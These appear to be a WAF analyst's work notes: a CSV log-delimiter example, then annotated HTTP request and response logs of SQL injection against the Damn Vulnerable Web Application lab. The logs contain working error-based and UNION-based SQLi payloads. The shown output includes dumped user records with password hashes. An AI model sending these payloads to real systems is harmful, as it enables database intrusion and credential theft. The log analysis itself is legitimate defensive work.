##################################################################################################################### # Work Area ##################################################################################################################### CSV Delimiter: ~,~ Log Format appearance: Standard no K/V "value1","value2","value3","value4" Gold Standard no K/V "value1"~,~"value2"~,~"value3"~,~"value4" Example proper URI Query that will break the Standard CSV with Delimiter & "" Text Qualifier: https://waflogic.com/partner_inventory? serv_1=(D)DoS Review","serv_deets_1=Review, Consult, Deploy","part_sel="Dynamo Inc., And Partners" Log #8, 9, 11 & 12 SQLi vulnerability discovered and also disclosed User ID 1 which is Admin (support_id=9216504019076315941 OR support_id=9216504019076315925 OR support_id=9216504019076276916) HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:16:22 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Tue, 23 Jun 2009 12:00:00 GMT\r\nCache-Control: no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 1360\r\nConnection: close\r\nContent-Type: text/html;charset=utf-8\r\n\r\n\n\n\n\n \n \n\n Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)\n\n \n\n \n\n \n\n \n\n \n
\n\n
\n\n \n\n
\n\n
\n\n
\n \n
\n\n
\n\n
\n\n \r\n
\r\n

Vulnerability: SQL Injection

\r\n\r\n
\r\n
\r\n

\r\n User ID:\n \n \r\n

\n\r\n
\r\n 
ID:1) AND 8477=6243 AND (6495=6495
First name: admin
Surname: admin
\r\n
\r\n\r\n

More Information

\r\n \r\n
\n\n

\n \n\n
\n\n
\n
\n\n
\n
Username: Unknown
Security Level: low
Locale: en
SQLi DB: mysql
\n
\n\n
\n\n

Damn Vulnerable Web Application (DVWA)

\n \n\n
\n\n
\n\n \n\n Log #13 MariaDB Discovery support_id=9216504019076315941 HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:16:23 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 329\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n
\n Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') AND 2159=2159#'' at line 1 in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php:11\nStack trace:\n#0 /var/www/html/DVWA/vulnerabilities/sqli/source/low.php(11): mysqli_query()\n#1 /var/www/html/DVWA/vulnerabilities/sqli/index.php(34): require_once('...')\n#2 {main}\n thrown in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php on line 11
\n Log #98 DataBase Discovery leveraging Exploit Latrix 0.6.0 - 'txtaccesscode' SQL Injection / Also reported as CVE-2022-2643 support_id=9216504019076316805 HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:16:25 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 261\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n
\nFatal error: Uncaught mysqli_sql_exception: FUNCTION dvwa.GTID_SUBSET does not exist in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php:11\nStack trace:\n#0 /var/www/html/DVWA/vulnerabilities/sqli/source/low.php(11): mysqli_query()\n#1 /var/www/html/DVWA/vulnerabilities/sqli/index.php(34): require_once('...')\n#2 {main}\n thrown in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php on line 11
\n GET /DVWA/vulnerabilities/sqli/?id=1%27%20OR%20GTID_SUBSET%28CONCAT%280x71767a6b71%2C%28SELECT%20%28ELT%289014%3D9014%2C1%29%29%29%2C0x71706b6b71%29%2C9014%29--%20Qchb&Submit=Submit HTTP/1.1\r\nHost: kali-play.waflogic.com\r\nsec-ch-ua: \r\nsec-ch-ua-mobile: ?0\r\nsec-ch-ua-platform: """"\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nWAF-Life: ""Chapter 2"",""Logging"",""The WAF Guy Was Here!""\r\nReferer: http://localhost/DVWA/vulnerabilities/sqli/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: security=low; PHPSESSID=ct6el3hmh1qmeiqb4n327d78b6\r\nConnection: close\r\n\r\n HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:16:25 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 261\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n
\ nFatal error: Uncaught mysqli_sql_exception: FUNCTION dvwa.GTID_SUBSET does not exist in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php:11\nStack trace:\n#0 /var/www/html/DVWA/vulnerabilities/sqli/source/low.php(11): mysqli_query()\n#1 /var/www/html/DVWA/vulnerabilities/sqli/index.php(34): require_once('...')\n#2 {main}\n thrown in /var/www/html/DVWA/vulnerabilities/sqli/source/low.php on line 11
\n Log# 3932 dvwa DataBase called in Attacker Query id=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71767a6b71%2CJSON_ARRAYAGG%28CONCAT_WS%280x617a626b6164%2C%60user%60%2Cavatar%2Cfailed_login%2Cfirst_name%2Clast_login%2Clast_name%2Cpassword%2Cuser_id%29%29%2C0x71706b6b71%29%20FROM%20dvwa.users%23&Submit=Submit id=1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,`user`,avatar,failed_login,first_name,last_login,last_name,password,user_id)),0x71706b6b71) FROM dvwa.users#&Submit=Submit HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:18:17 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Tue, 23 Jun 2009 12:00:00 GMT\r\nCache-Control: no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 1765\r\nConnection: close\r\nContent-Type: text/html;charset=utf-8\r\n\r\n\n\n\n\n \n \n\n Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)\n\n \n\n \n\n \n\n \n\n \n
\n\n
\n\n \n\n
\n\n
\n\n
\n \n
\n\n
\n\n
\n\n \r\n
\r\n

Vulnerability: SQL Injection

\r\n\r\n
\r\n
\r\n

\r\n User ID:\n \n \r\n

\n\r\n
\r\n 
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,`user`,avatar,failed_login,first_name,last_login,last_name,password,user_id)),0x71706b6b71) FROM dvwa.users#
First name: admin
Surname: admin
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,`user`,avatar,failed_login,first_name,last_login,last_name,password,user_id)),0x71706b6b71) FROM dvwa.users#
First name: 
Surname: qvzkq[""adminazbkad/DVWA/hackable/users/admin.jpgazbkad0azbkadadminazbkad2023-06-05 11:34:14azbkadadminazbkad5f4dcc3b5aa765d61d8327deb882cf99azbkad1"",""gordonbazbkad/DVWA/hackable/users/gordonb.jpgazbkad0azbkadGordonazbkad2023-06-05 11:34:14azbkadBrownazbkade99a18c428cb38d5f260853678922e03azbkad2"",""1337azbkad/DVWA/hackable/users/1337.jpgazbkad0azbkadHackazbkad2023-06-05 11:34:14azbkadMeazbkad8d3533d75ae2c3966d7e0d4fcc69216bazbkad3"",""pabloazbkad/DVWA/hackable/users/pablo.jpgazbkad0azbkadPabloazbkad2023-06-05 11:34:14azbkadPicassoazbkad0d107d09f5bbe40cade3de5c71e9e9b7azbkad4"",""smithyazbkad/DVWA/hackable/users/smithy.jpgazbkad0azbkadBobazbkad2023-06-05 11:34:14azbkadSmithazbkad5f4dcc3b5aa765d61d8327deb882cf99azbkad5""]qpkkq
\r\n
\r\n\r\n

More Information

\r\n \r\n
\n\n

\n \n\n
\n\n
\n
\n\n
\n
Username: Unknown
Security Level: low
Locale: en
SQLi DB: mysql
\n
\n\n
\n\n

Damn Vulnerable Web Application (DVWA)

\n \n\n
\n\n
\n\n \n\n id=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71767a6b71%2CJSON_ARRAYAGG%28CONCAT_WS%280x617a626b6164%2Ccomment%2Ccomment_id%2Cname%29%29%2C0x71706b6b71%29%20FROM%20dvwa.guestbook%23&Submit=Submit id=1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,comment,comment_id,name)),0x71706b6b71) FROM dvwa.guestbook#&Submit=Submit HTTP/1.1 200 OK\r\nDate: Wed, 07 Jun 2023 02:18:27 GMT\r\nServer: Apache/2.4.57 (Debian)\r\nExpires: Tue, 23 Jun 2009 12:00:00 GMT\r\nCache-Control: no-cache, must-revalidate\r\nPragma: no-cache\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nContent-Length: 1495\r\nConnection: close\r\nContent-Type: text/html;charset=utf-8\r\n\r\n\n\n\n\n \n \n\n Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)\n\n \n\n \n\n \n\n \n\n \n
\n\n
\n\n \n\n
\n\n
\n\n
\n \n
\n\n
\n\n
\n\n \r\n
\r\n

Vulnerability: SQL Injection

\r\n\r\n
\r\n
\r\n

\r\n User ID:\n \n \r\n

\n\r\n
\r\n 
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,comment,comment_id,name)),0x71706b6b71) FROM dvwa.guestbook#
First name: admin
Surname: admin
ID: 1' UNION ALL SELECT NULL,CONCAT(0x71767a6b71,JSON_ARRAYAGG(CONCAT_WS(0x617a626b6164,comment,comment_id,name)),0x71706b6b71) FROM dvwa.guestbook#
First name: 
Surname: qvzkq[""This is a test comment.azbkad1azbkadtest""]qpkkq
\r\n
\r\n\r\n

More Information

\r\n \r\n
\n\n

\n \n\n
\n\n
\n
\n\n
\n
Username: Unknown
Security Level: low
Locale: en
SQLi DB: mysql
\n
\n\n
\n\n

Damn Vulnerable Web Application (DVWA)

\n \n\n
\n\n
\n\n \n\n